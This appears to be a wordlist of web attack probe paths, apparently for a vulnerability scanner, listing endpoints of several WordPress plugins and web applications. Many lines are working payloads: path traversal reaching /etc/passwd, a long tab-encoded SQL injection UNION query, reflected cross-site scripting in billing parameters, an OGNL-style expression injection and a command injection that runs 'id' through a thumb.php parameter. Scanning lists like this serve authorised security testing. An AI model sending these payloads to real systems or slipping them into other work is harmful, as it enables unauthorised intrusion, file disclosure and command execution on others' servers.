/current_config/Sha1Account1
/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/password.jsn
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/service/v1/service-details
/shop/product/reviews.action?product.productId=secconsult
/shop/search.action?search=(%23context[
/shop/profile/register.action
index.php
pathCache.php
/agentLogUploader?computerName=DesktopCentral&domainName=webapps&customerId=..&filename=test.jsp
/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
/confirm.php
/admin.php?page=notification_by_mail
/admin.php?page=account_billing&vat_number=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
/admin.php?page=account_billing&billing_name=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
/admin.php?page=account_billing&company=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
/admin.php?page=account_billing&billing_address=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
/ajax/api/user/updateAvatar
/path/to/resource
/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/ajax/render/widget_tabbedcontainer_tab_panel
/include/findusers.php
/plugins/preloads/autologin.php
/software/
/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B
